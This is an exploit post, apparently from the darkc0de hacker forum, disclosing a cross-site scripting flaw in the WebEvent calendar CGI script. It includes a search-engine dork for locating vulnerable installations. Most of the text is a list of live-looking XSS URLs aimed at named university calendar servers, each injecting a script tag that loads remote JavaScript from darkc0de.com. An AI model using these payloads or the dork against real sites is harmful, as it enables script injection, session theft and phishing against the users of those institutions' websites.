# Title          :  WebEvent(tm) webevent.cgi Cross-Site Scripting Vulnerability

# Description    :  WebEvent(tm) is prone to a cross-site scripting vulnerability because the application fails to 					properly sanitize user-supplied input.

# Software       :  http://www.webevent.com/

# Author         :  d3hydr8

# Contact        :  d3hydr8[at]gmail[dot]com

# Original Post  :  http://forum.darkc0de.com/index.php?action=vthread&forum=12&topic=184

# Dork           :  intext:"Powered by WebEvent (tm)." inurl:"/webevent.cgi"

# Greets         :  mozi, whoami, icqbomber

#Proof           :

http://w4.eku.edu/cgi-bin/webevent/webevent.cgi?cmd=%22%3CSCRIPT+SRC=http://www.darkc0de.com/xss.js%3E%3C/SCRIPT%3E
WebEvent 2.61

http://calendar.purdue.edu/cgi-bin/webevent.cgi?cmd=%22%3CSCRIPT+SRC=http://www.darkc0de.com/xss.js%3E%3C/SCRIPT%3E
WebEvent 2.7

http://webcal.usf.edu/cgi-bin/webevent.cgi?cmd=%22%3CSCRIPT+SRC=http://www.darkc0de.com/xss.js%3E%3C/SCRIPT%3E
WebEvent 2.71

http://events.haas.berkeley.edu/webevent.cgi?cmd=%22%3CSCRIPT+SRC=http://www.darkc0de.com/xss.js%3E%3C/SCRIPT%3E
WebEvent 2.72

http://research.yale.edu/cgi-bin/mcdougal/publish2.72/webevent.cgi?cmd=%22%3CSCRIPT+SRC=http://www.darkc0de.com/xss.js%3E%3C/SCRIPT%3E
WebEvent 2.72

http://ic-server02.info-commons.uiowa.edu/cgi-bin/webevent.cgi?cmd=%22%3CSCRIPT+SRC=http://www.darkc0de.com/xss.js%3E%3C/SCRIPT%3E
WebEvent 4.03